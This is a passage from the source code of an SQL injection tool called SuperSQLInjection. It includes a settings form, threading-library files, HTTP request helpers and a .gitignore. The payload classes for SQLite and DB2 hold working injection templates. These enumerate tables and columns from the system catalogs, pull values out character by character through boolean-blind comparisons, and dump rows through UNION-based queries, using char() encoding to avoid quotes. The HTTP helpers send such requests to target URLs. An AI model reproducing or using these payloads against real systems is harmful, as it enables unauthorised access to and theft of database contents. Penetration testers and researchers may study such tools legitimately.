61 | this.txt_proxy_host.Text = main.config.proxy_check_host;
62 | this.txt_proxy_port.Text = main.config.proxy_check_port.ToString();
63 | this.txt_proxy_keys.Text = main.config.proxy_check_Keys;
64 | }
65 |
66 | private void cob_maxClolumnsCount_SelectedValueChanged(object sender, EventArgs e)
67 | {
68 | main.config.maxClolumns = int.Parse(this.cmb_maxClolumnsCount.Text);
69 | }
70 |
71 | private void cob_oneDomainMaxSpiderCount_SelectedValueChanged(object sender, EventArgs e)
72 | {
73 | main.config.maxSpiderCount = int.Parse(this.cmb_oneDomainMaxSpiderCount.Text);
74 | }
75 |
76 | private void cob_oneDomainMaxScanCount_SelectedValueChanged(object sender, EventArgs e)
77 | {
78 | main.config.maxScanCount = int.Parse(this.cmb_oneDomainMaxScanCount.Text);
79 | }
80 |
81 | private void chk_redirectDoGet_CheckedChanged(object sender, EventArgs e)
82 | {
83 | main.config.redirectDoGet = this.chk_redirectDoGet.Checked;
84 | }
85 |
86 | private void cmb_unionFill_SelectedValueChanged(object sender, EventArgs e)
87 | {
88 | main.config.unionFill = this.cmb_unionFill.Text;
89 | }
90 |
91 | private void txt_proxy_host_TextChanged(object sender, EventArgs e)
92 | {
93 | main.config.proxy_check_host = this.txt_proxy_host.Text;
94 | }
95 |
96 | private void txt_proxy_port_TextChanged(object sender, EventArgs e)
97 | {
98 | main.config.proxy_check_port = Tools.convertToInt(this.txt_proxy_port.Text);
99 | }
100 |
101 | private void txt_proxy_keys_TextChanged(object sender, EventArgs e)
102 | {
103 | main.config.proxy_check_Keys = this.txt_proxy_keys.Text;
104 | }
105 | }
106 | }
107 |
--------------------------------------------------------------------------------
/SuperSQLInjection/tools/smartthread/Exceptions.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | #if !(_WINDOWS_CE)
3 | using System.Runtime.Serialization;
4 | #endif
5 |
6 | namespace Amib.Threading
7 | {
8 | #region Exceptions
9 |
10 | ///
11 | /// Represents an exception in case IWorkItemResult.GetResult has been canceled
12 | ///
13 | public sealed partial class WorkItemCancelException : Exception
14 | {
15 | public WorkItemCancelException()
16 | {
17 | }
18 |
19 | public WorkItemCancelException(string message)
20 | : base(message)
21 | {
22 | }
23 |
24 | public WorkItemCancelException(string message, Exception e)
25 | : base(message, e)
26 | {
27 | }
28 | }
29 |
30 | ///
31 | /// Represents an exception in case IWorkItemResult.GetResult has been timed out
32 | ///
33 | public sealed partial class WorkItemTimeoutException : Exception
34 | {
35 | public WorkItemTimeoutException()
36 | {
37 | }
38 |
39 | public WorkItemTimeoutException(string message)
40 | : base(message)
41 | {
42 | }
43 |
44 | public WorkItemTimeoutException(string message, Exception e)
45 | : base(message, e)
46 | {
47 | }
48 | }
49 |
50 | ///
51 | /// Represents an exception in case IWorkItemResult.GetResult has been timed out
52 | ///
53 | public sealed partial class WorkItemResultException : Exception
54 | {
55 | public WorkItemResultException()
56 | {
57 | }
58 |
59 | public WorkItemResultException(string message)
60 | : base(message)
61 | {
62 | }
63 |
64 | public WorkItemResultException(string message, Exception e)
65 | : base(message, e)
66 | {
67 | }
68 | }
69 |
70 |
71 | ///
72 | /// Represents an exception in case the STP queue is full and work item cannot be queued.
73 | /// Relevant when the STP has a queue size limit
74 | ///
75 | public sealed partial class QueueRejectedException : Exception
76 | {
77 | public QueueRejectedException()
78 | {
79 | }
80 |
81 | public QueueRejectedException(string message)
82 | : base(message)
83 | {
84 | }
85 |
86 | public QueueRejectedException(string message, Exception e)
87 | : base(message, e)
88 | {
89 | }
90 | }
91 |
92 | #if !(_WINDOWS_CE) && !(_SILVERLIGHT) && !(WINDOWS_PHONE)
93 | ///
94 | /// Represents an exception in case IWorkItemResult.GetResult has been canceled
95 | ///
96 | [Serializable]
97 | public sealed partial class WorkItemCancelException
98 | {
99 | public WorkItemCancelException(SerializationInfo si, StreamingContext sc)
100 | : base(si, sc)
101 | {
102 | }
103 | }
104 |
105 | ///
106 | /// Represents an exception in case IWorkItemResult.GetResult has been timed out
107 | ///
108 | [Serializable]
109 | public sealed partial class WorkItemTimeoutException
110 | {
111 | public WorkItemTimeoutException(SerializationInfo si, StreamingContext sc)
112 | : base(si, sc)
113 | {
114 | }
115 | }
116 |
117 | ///
118 | /// Represents an exception in case IWorkItemResult.GetResult has been timed out
119 | ///
120 | [Serializable]
121 | public sealed partial class WorkItemResultException
122 | {
123 | public WorkItemResultException(SerializationInfo si, StreamingContext sc)
124 | : base(si, sc)
125 | {
126 | }
127 | }
128 |
129 | ///
130 | /// Represents an exception in case IWorkItemResult.GetResult has been timed out
131 | ///
132 | [Serializable]
133 | public sealed partial class QueueRejectedException
134 | {
135 | public QueueRejectedException(SerializationInfo si, StreamingContext sc)
136 | : base(si, sc)
137 | {
138 | }
139 | }
140 |
141 | #endif
142 |
143 | #endregion
144 | }
145 |
--------------------------------------------------------------------------------
/SuperSQLInjection/tools/smartthread/WorkItemResultTWrapper.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Threading;
3 |
4 | namespace Amib.Threading.Internal
5 | {
6 | #region WorkItemResultTWrapper class
7 |
8 | internal class WorkItemResultTWrapper : IWorkItemResult, IInternalWaitableResult
9 | {
10 | private readonly IWorkItemResult _workItemResult;
11 |
12 | public WorkItemResultTWrapper(IWorkItemResult workItemResult)
13 | {
14 | _workItemResult = workItemResult;
15 | }
16 |
17 | #region IWorkItemResult Members
18 |
19 | public TResult GetResult()
20 | {
21 | return (TResult)_workItemResult.GetResult();
22 | }
23 |
24 | public TResult GetResult(int millisecondsTimeout, bool exitContext)
25 | {
26 | return (TResult)_workItemResult.GetResult(millisecondsTimeout, exitContext);
27 | }
28 |
29 | public TResult GetResult(TimeSpan timeout, bool exitContext)
30 | {
31 | return (TResult)_workItemResult.GetResult(timeout, exitContext);
32 | }
33 |
34 | public TResult GetResult(int millisecondsTimeout, bool exitContext, WaitHandle cancelWaitHandle)
35 | {
36 | return (TResult)_workItemResult.GetResult(millisecondsTimeout, exitContext, cancelWaitHandle);
37 | }
38 |
39 | public TResult GetResult(TimeSpan timeout, bool exitContext, WaitHandle cancelWaitHandle)
40 | {
41 | return (TResult)_workItemResult.GetResult(timeout, exitContext, cancelWaitHandle);
42 | }
43 |
44 | public TResult GetResult(out Exception e)
45 | {
46 | return (TResult)_workItemResult.GetResult(out e);
47 | }
48 |
49 | public TResult GetResult(int millisecondsTimeout, bool exitContext, out Exception e)
50 | {
51 | return (TResult)_workItemResult.GetResult(millisecondsTimeout, exitContext, out e);
52 | }
53 |
54 | public TResult GetResult(TimeSpan timeout, bool exitContext, out Exception e)
55 | {
56 | return (TResult)_workItemResult.GetResult(timeout, exitContext, out e);
57 | }
58 |
59 | public TResult GetResult(int millisecondsTimeout, bool exitContext, WaitHandle cancelWaitHandle, out Exception e)
60 | {
61 | return (TResult)_workItemResult.GetResult(millisecondsTimeout, exitContext, cancelWaitHandle, out e);
62 | }
63 |
64 | public TResult GetResult(TimeSpan timeout, bool exitContext, WaitHandle cancelWaitHandle, out Exception e)
65 | {
66 | return (TResult)_workItemResult.GetResult(timeout, exitContext, cancelWaitHandle, out e);
67 | }
68 |
69 | public bool IsCompleted
70 | {
71 | get { return _workItemResult.IsCompleted; }
72 | }
73 |
74 | public bool IsCanceled
75 | {
76 | get { return _workItemResult.IsCanceled; }
77 | }
78 |
79 | public object State
80 | {
81 | get { return _workItemResult.State; }
82 | }
83 |
84 | public bool Cancel()
85 | {
86 | return _workItemResult.Cancel();
87 | }
88 |
89 | public bool Cancel(bool abortExecution)
90 | {
91 | return _workItemResult.Cancel(abortExecution);
92 | }
93 |
94 | public WorkItemPriority WorkItemPriority
95 | {
96 | get { return _workItemResult.WorkItemPriority; }
97 | }
98 |
99 | public TResult Result
100 | {
101 | get { return (TResult)_workItemResult.Result; }
102 | }
103 |
104 | public object Exception
105 | {
106 | get { return _workItemResult.Exception; }
107 | }
108 |
109 | #region IInternalWorkItemResult Members
110 |
111 | public IWorkItemResult GetWorkItemResult()
112 | {
113 | return _workItemResult.GetWorkItemResult();
114 | }
115 |
116 | public IWorkItemResult GetWorkItemResultT()
117 | {
118 | return (IWorkItemResult)this;
119 | }
120 |
121 | #endregion
122 |
123 | #endregion
124 | }
125 |
126 | #endregion
127 |
128 | }
129 |
--------------------------------------------------------------------------------
/SuperSQLInjection/tools/smartthread/CallerThreadContext.cs:
--------------------------------------------------------------------------------
1 |
2 | #if !(_WINDOWS_CE) && !(_SILVERLIGHT) && !(WINDOWS_PHONE)
3 |
4 | using System;
5 | using System.Diagnostics;
6 | using System.Threading;
7 | using System.Reflection;
8 | using System.Web;
9 | using System.Runtime.Remoting.Messaging;
10 |
11 |
12 | namespace Amib.Threading.Internal
13 | {
14 | #region CallerThreadContext class
15 |
16 | ///
17 | /// This class stores the caller call context in order to restore
18 | /// it when the work item is executed in the thread pool environment.
19 | ///
20 | internal class CallerThreadContext
21 | {
22 | #region Prepare reflection information
23 |
24 | // Cached type information.
25 | private static readonly MethodInfo getLogicalCallContextMethodInfo =
26 | typeof(Thread).GetMethod("GetLogicalCallContext", BindingFlags.Instance | BindingFlags.NonPublic);
27 |
28 | private static readonly MethodInfo setLogicalCallContextMethodInfo =
29 | typeof(Thread).GetMethod("SetLogicalCallContext", BindingFlags.Instance | BindingFlags.NonPublic);
30 |
31 | private static string HttpContextSlotName = GetHttpContextSlotName();
32 |
33 | private static string GetHttpContextSlotName()
34 | {
35 | FieldInfo fi = typeof(HttpContext).GetField("CallContextSlotName", BindingFlags.Static | BindingFlags.NonPublic);
36 |
37 | if (fi != null)
38 | {
39 | return (string) fi.GetValue(null);
40 | }
41 |
42 | return "HttpContext";
43 | }
44 |
45 | #endregion
46 |
47 | #region Private fields
48 |
49 | private HttpContext _httpContext;
50 | private LogicalCallContext _callContext;
51 |
52 | #endregion
53 |
54 | ///
55 | /// Constructor
56 | ///
57 | private CallerThreadContext()
58 | {
59 | }
60 |
61 | public bool CapturedCallContext
62 | {
63 | get
64 | {
65 | return (null != _callContext);
66 | }
67 | }
68 |
69 | public bool CapturedHttpContext
70 | {
71 | get
72 | {
73 | return (null != _httpContext);
74 | }
75 | }
76 |
77 | ///
78 | /// Captures the current thread context
79 | ///
80 | ///
81 | public static CallerThreadContext Capture(
82 | bool captureCallContext,
83 | bool captureHttpContext)
84 | {
85 | Debug.Assert(captureCallContext || captureHttpContext);
86 |
87 | CallerThreadContext callerThreadContext = new CallerThreadContext();
88 |
89 | // TODO: In NET 2.0, redo using the new feature of ExecutionContext class - Capture()
90 | // Capture Call Context
91 | if(captureCallContext && (getLogicalCallContextMethodInfo != null))
92 | {
93 | callerThreadContext._callContext = (LogicalCallContext)getLogicalCallContextMethodInfo.Invoke(Thread.CurrentThread, null);
94 | if (callerThreadContext._callContext != null)
95 | {
96 | callerThreadContext._callContext = (LogicalCallContext)callerThreadContext._callContext.Clone();
97 | }
98 | }
99 |
100 | // Capture httpContext
101 | if (captureHttpContext && (null != HttpContext.Current))
102 | {
103 | callerThreadContext._httpContext = HttpContext.Current;
104 | }
105 |
106 | return callerThreadContext;
107 | }
108 |
109 | ///
110 | /// Applies the thread context stored earlier
111 | ///
112 | ///
113 | public static void Apply(CallerThreadContext callerThreadContext)
114 | {
115 | if (null == callerThreadContext)
116 | {
117 | throw new ArgumentNullException("callerThreadContext");
118 | }
119 |
120 | // Todo: In NET 2.0, redo using the new feature of ExecutionContext class - Run()
121 | // Restore call context
122 | if ((callerThreadContext._callContext != null) && (setLogicalCallContextMethodInfo != null))
123 | {
124 | setLogicalCallContextMethodInfo.Invoke(Thread.CurrentThread, new object[] { callerThreadContext._callContext });
125 | }
126 |
127 | // Restore HttpContext
128 | if (callerThreadContext._httpContext != null)
129 | {
130 | HttpContext.Current = callerThreadContext._httpContext;
131 | //CallContext.SetData(HttpContextSlotName, callerThreadContext._httpContext);
132 | }
133 | }
134 | }
135 |
136 | #endregion
137 | }
138 | #endif
139 |
--------------------------------------------------------------------------------
/SuperSQLInjection/payload/SQLite.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections.Generic;
3 | using System.Text;
4 | using tools;
5 |
6 | namespace SuperSQLInjection.payload
7 | {
8 | class SQLite
9 | {
10 | //加载对应配置(需要读取的环境变量)
11 | public static String path = "config/vers/sqlite.txt";
12 | public static List vers = FileTool.readFileToList(path);
13 |
14 | //表数量
15 | public static String tables_count = "(select count(1) from sqlite_master where type=char(116)||char(97)||char(98)||char(108)||char(101))";
16 |
17 | //获取表名称
18 | public static String table_value = "(select tbl_name from sqlite_master where type=char(116)||char(97)||char(98)||char(108)||char(101) limit 1 offset {index})";
19 |
20 | //获取列名称
21 | public static String column_value = "(select substr(sql,instr(sql,char(40))) from sqlite_master where type=char(116)||char(97)||char(98)||char(108)||char(101) and tbl_name='{table}')";
22 |
23 | //获取表数量bool
24 | public static String bool_tables_count = " " + tables_count + ">{len}";
25 |
26 |
27 | //bool方式字符长度判断
28 | public static String bool_length = " length({data})>{len}";
29 |
30 | public static String check_li_value = " length({data})<{len}";
31 |
32 |
33 | //bool方式获取值
34 | public static String bool_value = " unicode(substr({data},{index},1))>{len}";
35 |
36 | //bool方式获取值
37 | public static String bool_noUnicode_value = "{data}>{len}";
38 |
39 | public static String unicode_value = " unicode(substr({data},{index},1))";
40 |
41 | //获取行数据
42 | public static String data_value = "(select {data} from {table} limit 1 offset {index})";
43 |
44 | //union获取数据条数
45 | public static String data_count = "(select count(1) from {table})";
46 |
47 | public static String bool_datas_count = " " + data_count + ">={len}";
48 |
49 | //union获取值
50 | public static String union_value = " 1=2 union all select {data}";
51 |
52 | public static String getUnionDataValue(int columnsLen, int showIndex, String Fill, List columns, String table, String index)
53 | {
54 | StringBuilder sb = new StringBuilder();
55 | String data = "char(94)||char(94)||char(33)||" + unionColumns(columns, "||char(36)||char(9)||char(36)||") + "||char(33)||char(94)||char(94)";
56 | for (int i = 1; i <= columnsLen; i++)
57 | {
58 | if (i == showIndex)
59 | {
60 | sb.Append(data_value.Replace("{data}", data).Replace("{allcolumns}", unionColumns(columns, ",")).Replace("{table}", table).Replace("{index}", index));
61 | sb.Append(",");
62 | }
63 | else
64 | {
65 | sb.Append(Fill + ",");
66 | }
67 | }
68 | sb.Remove(sb.Length - 1, 1);
69 | return union_value.Replace("{data}", sb.ToString());
70 | }
71 |
72 | public static String unionColumns(List columns, String unionStr)
73 | {
74 | StringBuilder sb = new StringBuilder();
75 | foreach (String column in columns)
76 | {
77 |
78 | sb.Append("coalesce("+column+",char(32))"+unionStr);
79 | }
80 | sb.Remove(sb.Length - unionStr.Length, unionStr.Length);
81 | return sb.ToString();
82 | }
83 |
84 | public static String getUnionDataValue(int columnsLen, int showIndex, String Fill, String dataPayLoad)
85 | {
86 | StringBuilder sb = new StringBuilder();
87 | for (int i = 1; i <= columnsLen; i++)
88 | {
89 | if (i == showIndex)
90 | {
91 | sb.Append("(char(94)||char(94)||char(33)||" + dataPayLoad + "||char(33)||char(94)||char(94)),");
92 | }
93 | else
94 | {
95 | sb.Append(Fill + ",");
96 | }
97 | }
98 | sb.Remove(sb.Length - 1, 1);
99 | return union_value.Replace("{data}", sb.ToString());
100 | }
101 | public static String getBoolDataPayLoad(String column, List columns, String dbName, String table, int index)
102 | {
103 | String data = data_value.Replace("{data}", column).Replace("{allcolumns}", unionColumns(columns, ",")).Replace("{orderby}", columns[0]);
104 | String payload = data.Replace("{dbname}", dbName).Replace("{table}", table).Replace("{data}", column).Replace("{index}", index.ToString());
105 | return payload;
106 | }
107 |
108 | }
109 | }
110 |
--------------------------------------------------------------------------------
/SuperSQLInjection/tools/http/HTTPRequest.cs:
--------------------------------------------------------------------------------
1 | using model;
2 | using System;
3 | using System.Collections.Generic;
4 | using System.IO;
5 | using System.Net;
6 | using System.Text;
7 | using System.Text.RegularExpressions;
8 | using tools;
9 |
10 | namespace SuperSQLInjection.tools
11 | {
12 | class HTTPRequest
13 | {
14 | public static ServerInfo getHtmlByPost(String url, String data,String referer,String cookies)
15 | {
16 | ServerInfo server = new ServerInfo();
17 | HttpWebResponse response = null;
18 | StreamReader sr = null;
19 | HttpWebRequest request = null;
20 |
21 | try
22 | {
23 | //设置模拟http访问参数
24 | Uri uri = new Uri(url);
25 | request = (HttpWebRequest)WebRequest.Create(uri);
26 | request.Method = "POST";
27 | request.UserAgent = "Mozilla/5.0";
28 | request.ContentType = "application/x-www-form-urlencoded";
29 | request.Timeout = 30000;
30 | request.KeepAlive = true;
31 | if (referer != null) {
32 | request.Referer = referer;
33 | }
34 | request.AllowAutoRedirect = false;
35 | if (!"".Equals(cookies))
36 | {
37 | request.Headers.Add("Cookie", cookies);
38 | }
39 | byte[] bydata = Encoding.ASCII.GetBytes(data);
40 | request.ContentLength = bydata.Length;
41 | Stream reqStream = request.GetRequestStream();
42 | reqStream.Write(bydata, 0, bydata.Length);
43 | reqStream.Close();
44 | response = (HttpWebResponse)request.GetResponse();
45 | CookieCollection cc = response.Cookies;
46 | StreamReader str = new StreamReader(response.GetResponseStream());
47 | server.body= str.ReadToEnd();
48 | server.cookies = response.Headers["Set-Cookie"];
49 | }
50 | catch (Exception e)
51 | {
52 | Tools.SysLog(e.Message);
53 | }
54 | finally
55 | {
56 | if (sr != null)
57 | {
58 | sr.Close();
59 | }
60 | if (response != null)
61 | {
62 | response.Close();
63 | }
64 | if (request != null)
65 | {
66 | request.Abort();
67 | }
68 | }
69 | return server;
70 | }
71 | public static String getHTMLEncoding(String header)
72 | {
73 |
74 | Match m = Regex.Match(header, "charset=\\S{0,8}\"");
75 | if (m.Success)
76 | {
77 | return m.Groups[0].Value.Replace("charset=", "").Replace("\"", "");
78 | }
79 | return "";
80 | }
81 | public static ServerInfo getHtml(String url,String referer,String cookies)
82 | {
83 | ServerInfo server = new ServerInfo();
84 | HttpWebResponse response = null;
85 | StreamReader sr = null;
86 | HttpWebRequest request = null;
87 | try
88 | {
89 |
90 | //设置模拟http访问参数
91 | Uri uri = new Uri(url);
92 | request = (HttpWebRequest)WebRequest.Create(uri);
93 | request.Accept = "*/*";
94 | request.Method = "GET";
95 | request.Timeout = 30000;
96 | request.AllowAutoRedirect = false;
97 | if (referer != null)
98 | {
99 | request.Referer = referer;
100 | }
101 | if (!"".Equals(cookies))
102 | {
103 | request.Headers.Add("Cookie", cookies);
104 | }
105 | response = (HttpWebResponse)request.GetResponse();
106 | sr = new StreamReader(response.GetResponseStream(), Encoding.UTF8);
107 |
108 | //读取服务器端返回的消息
109 | server.body = sr.ReadToEnd();
110 | server.cookies = response.Headers["Set-Cookie"];
111 |
112 | }
113 | catch (Exception e)
114 | {
115 | Tools.SysLog(e.Message);
116 | }
117 | finally
118 | {
119 | if (sr != null)
120 | {
121 | sr.Close();
122 | }
123 | if (response != null)
124 | {
125 | response.Close();
126 | }
127 | if (request != null)
128 | {
129 | request.Abort();
130 | }
131 | }
132 | return server;
133 | }
134 | }
135 | }
136 |
--------------------------------------------------------------------------------
/.gitignore:
--------------------------------------------------------------------------------
1 | ## Ignore Visual Studio temporary files, build results, and
2 | ## files generated by popular Visual Studio add-ons.
3 |
4 | # User-specific files
5 | *.suo
6 | *.user
7 | *.userosscache
8 | *.sln.docstates
9 |
10 | # User-specific files (MonoDevelop/Xamarin Studio)
11 | *.userprefs
12 |
13 | # Build results
14 | [Dd]ebug/
15 | [Dd]ebugPublic/
16 | [Rr]elease/
17 | [Rr]eleases/
18 | [Xx]64/
19 | [Xx]86/
20 | [Bb]uild/
21 | bld/
22 | [Bb]in/
23 | [Oo]bj/
24 |
25 | # Visual Studio 2015 cache/options directory
26 | .vs/
27 | # Uncomment if you have tasks that create the project's static files in wwwroot
28 | #wwwroot/
29 |
30 | # MSTest test Results
31 | [Tt]est[Rr]esult*/
32 | [Bb]uild[Ll]og.*
33 |
34 | # NUNIT
35 | *.VisualState.xml
36 | TestResult.xml
37 |
38 | # Build Results of an ATL Project
39 | [Dd]ebugPS/
40 | [Rr]eleasePS/
41 | dlldata.c
42 |
43 | # DNX
44 | project.lock.json
45 | artifacts/
46 |
47 | *_i.c
48 | *_p.c
49 | *_i.h
50 | *.ilk
51 | *.meta
52 | *.obj
53 | *.pch
54 | *.pdb
55 | *.pgc
56 | *.pgd
57 | *.rsp
58 | *.sbr
59 | *.tlb
60 | *.tli
61 | *.tlh
62 | *.tmp
63 | *.tmp_proj
64 | *.log
65 | *.vspscc
66 | *.vssscc
67 | .builds
68 | *.pidb
69 | *.svclog
70 | *.scc
71 |
72 | # Chutzpah Test files
73 | _Chutzpah*
74 |
75 | # Visual C++ cache files
76 | ipch/
77 | *.aps
78 | *.ncb
79 | *.opendb
80 | *.opensdf
81 | *.sdf
82 | *.cachefile
83 | *.VC.db
84 |
85 | # Visual Studio profiler
86 | *.psess
87 | *.vsp
88 | *.vspx
89 | *.sap
90 |
91 | # TFS 2012 Local Workspace
92 | $tf/
93 |
94 | # Guidance Automation Toolkit
95 | *.gpState
96 |
97 | # ReSharper is a .NET coding add-in
98 | _ReSharper*/
99 | *.[Rr]e[Ss]harper
100 | *.DotSettings.user
101 |
102 | # JustCode is a .NET coding add-in
103 | .JustCode
104 |
105 | # TeamCity is a build add-in
106 | _TeamCity*
107 |
108 | # DotCover is a Code Coverage Tool
109 | *.dotCover
110 |
111 | # NCrunch
112 | _NCrunch_*
113 | .*crunch*.local.xml
114 | nCrunchTemp_*
115 |
116 | # MightyMoose
117 | *.mm.*
118 | AutoTest.Net/
119 |
120 | # Web workbench (sass)
121 | .sass-cache/
122 |
123 | # Installshield output folder
124 | [Ee]xpress/
125 |
126 | # DocProject is a documentation generator add-in
127 | DocProject/buildhelp/
128 | DocProject/Help/*.HxT
129 | DocProject/Help/*.HxC
130 | DocProject/Help/*.hhc
131 | DocProject/Help/*.hhk
132 | DocProject/Help/*.hhp
133 | DocProject/Help/Html2
134 | DocProject/Help/html
135 |
136 | # Click-Once directory
137 | publish/
138 |
139 | # Publish Web Output
140 | *.[Pp]ublish.xml
141 | *.azurePubxml
142 |
143 | # TODO: Un-comment the next line if you do not want to checkin
144 | # your web deploy settings because they may include unencrypted
145 | # passwords
146 | #*.pubxml
147 | *.publishproj
148 |
149 | # NuGet Packages
150 | *.nupkg
151 | # The packages folder can be ignored because of Package Restore
152 | **/packages/*
153 | # except build/, which is used as an MSBuild target.
154 | !**/packages/build/
155 | # Uncomment if necessary however generally it will be regenerated when needed
156 | #!**/packages/repositories.config
157 | # NuGet v3's project.json files produces more ignoreable files
158 | *.nuget.props
159 | *.nuget.targets
160 |
161 | # Microsoft Azure Build Output
162 | csx/
163 | *.build.csdef
164 |
165 | # Microsoft Azure Emulator
166 | ecf/
167 | rcf/
168 |
169 | # Windows Store app package directory
170 | AppPackages/
171 | BundleArtifacts/
172 |
173 | # Visual Studio cache files
174 | # files ending in .cache can be ignored
175 | *.[Cc]ache
176 | # but keep track of directories ending in .cache
177 | !*.[Cc]ache/
178 |
179 | # Others
180 | ClientBin/
181 | [Ss]tyle[Cc]op.*
182 | ~$*
183 | *~
184 | *.dbmdl
185 | *.dbproj.schemaview
186 | *.pfx
187 | *.publishsettings
188 | node_modules/
189 | orleans.codegen.cs
190 |
191 | # RIA/Silverlight projects
192 | Generated_Code/
193 |
194 | # Backup & report files from converting an old project file
195 | # to a newer Visual Studio version. Backup files are not needed,
196 | # because we have git ;-)
197 | _UpgradeReport_Files/
198 | Backup*/
199 | UpgradeLog*.XML
200 | UpgradeLog*.htm
201 |
202 | # SQL Server files
203 | *.mdf
204 | *.ldf
205 |
206 | # Business Intelligence projects
207 | *.rdl.data
208 | *.bim.layout
209 | *.bim_*.settings
210 |
211 | # Microsoft Fakes
212 | FakesAssemblies/
213 |
214 | # GhostDoc plugin setting file
215 | *.GhostDoc.xml
216 |
217 | # Node.js Tools for Visual Studio
218 | .ntvs_analysis.dat
219 |
220 | # Visual Studio 6 build log
221 | *.plg
222 |
223 | # Visual Studio 6 workspace options file
224 | *.opt
225 |
226 | # Visual Studio LightSwitch build output
227 | **/*.HTMLClient/GeneratedArtifacts
228 | **/*.DesktopClient/GeneratedArtifacts
229 | **/*.DesktopClient/ModelManifest.xml
230 | **/*.Server/GeneratedArtifacts
231 | **/*.Server/ModelManifest.xml
232 | _Pvt_Extensions
233 |
234 | # LightSwitch generated files
235 | GeneratedArtifacts/
236 | ModelManifest.xml
237 |
238 | # Paket dependency manager
239 | .paket/paket.exe
240 |
241 | # FAKE - F# Make
242 | .fake/
243 |
--------------------------------------------------------------------------------
/SuperSQLInjection/payload/DB2.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections.Generic;
3 | using System.Text;
4 | using tools;
5 |
6 | namespace SuperSQLInjection.payload
7 | {
8 | class DB2
9 | {
10 | //加载对应配置(需要读取的环境变量)
11 | public static String path = "config/vers/db2.txt";
12 | public static List vers = FileTool.readFileToList(path);
13 |
14 | //数据库数量
15 | public static String dbs_count = "(select count(1) from sysibm.sysschemata)";
16 | //表数量
17 | public static String tables_count = "(select count(1) from sysibm.systables where creator='{dbname}')";
18 | //列数量
19 | public static String columns_count = "(select count(1) from sysibm.syscolumns where tbcreator='{dbname}' and tbname='{table}')";
20 |
21 |
22 | //获取数据库名
23 | public static String db_value = "(select name from (select name,rownumber() over() rownum from sysibm.sysschemata) t where t.rownum={index})";
24 | //获取表名称
25 | public static String table_value = "(select name from (select name,rownumber() over() rownum from sysibm.systables where creator='{dbname}') t where t.rownum={index})";
26 | //获取列名称
27 | public static String column_value = "(select name from (select name,rownumber() over() rownum from sysibm.syscolumns where tbcreator='{dbname}' and tbname='{table}') t where t.rownum={index})";
28 |
29 |
30 | //获取数据库数量bool方式
31 | public static String bool_db_count = " " + dbs_count + ">{len}";
32 | //获取表数量bool
33 | public static String bool_tables_count = " " + tables_count + ">{len}";
34 | //获取列数量bool
35 | public static String bool_columns_count = " " + columns_count + ">{len}";
36 |
37 |
38 |
39 | public static String substr = "substr(({data})),{index},1)";
40 | //多字节
41 | public static String hex_value = "hex({data})";
42 |
43 | //bool方式字符长度判断
44 | public static String bool_length = " length(rtrim(({data})))>{len}";
45 |
46 | //bool方式获取值
47 | public static String bool_value = " ascii(substr({data},{index},1))>{len}";
48 |
49 | public static String cast_value = "coalesce(rtrim(cast({data} as char(254))),chr(32))";
50 |
51 | //获取行数据
52 | public static String data_value = "(select "+ cast_value + " from (select {allcolumns},rownumber() over() rownum from {dbname}.{table}) t where t.rownum={index})";
53 |
54 | //获取行数据
55 | public static String data_no_cast_value = "(select {data} from (select {allcolumns},rownumber() over() rownum from {dbname}.{table}) t where t.rownum={index})";
56 |
57 |
58 | //union获取数据条数
59 | public static String data_count = "(select count(1) from {dbname}.{table})";
60 |
61 | public static String bool_datas_count = " " + data_count + ">={len}";
62 |
63 | //union获取值
64 | public static String union_value = " 1=2 union all select {data} from sysibm.sysdummy1";
65 |
66 | public static String getUnionDataValue(String unionFileTemplate, String dataPayLoad, String dbname, String table, String index)
67 | {
68 | String temlate=unionFileTemplate.Replace("{data}", "(chr(94)||chr(94)||chr(33)||" + cast_value.Replace("{data}", dataPayLoad.Replace("{dbname}", dbname).Replace("{table}", table).Replace("{index}", index)) + "||chr(33)||chr(94)||chr(94))");
69 | return union_value.Replace("{data}", temlate);
70 | }
71 |
72 | public static String unionColumns(List columns, String unionStr)
73 | {
74 | StringBuilder sb = new StringBuilder();
75 | foreach (String column in columns)
76 | {
77 | sb.Append(cast_value.Replace("{data}", column) + unionStr);
78 | }
79 | sb.Remove(sb.Length - unionStr.Length, unionStr.Length);
80 | return sb.ToString();
81 | }
82 |
83 | public static String getUnionDataValue(String unionFileTemplate, List columns, String dbname, String table, String index)
84 | {
85 | String data = "chr(94)||chr(94)||chr(33)||" + unionColumns(columns,"||chr(36)||chr(9)||chr(36)||") + "||chr(33)||chr(94)||chr(94)";
86 | String template= unionFileTemplate.Replace("{data}", (data_no_cast_value.Replace("{data}", data).Replace("{allcolumns}", Comm.unionColumns(columns, ",")).Replace("{dbname}", dbname).Replace("{table}", table).Replace("{index}", index)));
87 | return union_value.Replace("{data}", template);
88 | }
89 |
90 | ///
91 | /// 获得bool方式值payload
92 | ///
93 | /// 对应值的查询SQL
94 | /// 数据库名
95 | /// 表名
96 | /// 下标
97 | ///
98 | public static String getBoolDataPayLoad(String column, String dbName, String table, int index)
99 | {
100 | String payload = data_value.Replace("{data}", column).Replace("{allcolumns}", column).Replace("{dbname}", dbName).Replace("{table}", table).Replace("{index}", index.ToString());
101 | return payload;
102 | }
103 | }
104 | }
105 |
--------------------------------------------------------------------------------
/SuperSQLInjection/tools/XML.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections.Generic;
3 | using System.Text;
4 | using System.Xml;
5 | using SuperSQLInjection.model;
6 | using System.IO;
7 | using System.Xml.Serialization;
8 | using System.Windows.Forms;
9 | using tools;
10 |
11 | namespace SuperSQLInjection.tools
12 | {
13 | class XML
14 | {
15 | public static Boolean SaveMyConfig(){
16 | XmlDocument doc = new XmlDocument();
17 | XmlDeclaration xdl= doc.CreateXmlDeclaration("1.0", "UTF-8", null);
18 | doc.AppendChild(xdl);
19 | return true;
20 | }
21 |
22 | public static void saveConfig(String fileName,Config config)
23 | {
24 | Stream fStream = null;
25 | try
26 | {
27 | fStream = new FileStream(fileName, FileMode.Create, FileAccess.ReadWrite);
28 | //创建XML序列化器,需要指定对象的类型
29 | XmlSerializer xmlFormat = new XmlSerializer(typeof(Config));
30 | xmlFormat.Serialize(fStream, config);
31 |
32 | }
33 | catch (Exception e)
34 | {
35 | throw e;
36 | }
37 | finally {
38 | if(fStream!=null){
39 | fStream.Close();
40 | }
41 |
42 | }
43 | }
44 |
45 | public static void saveObject(String fileName, Object obj)
46 | {
47 | Stream fStream = null;
48 | try
49 | {
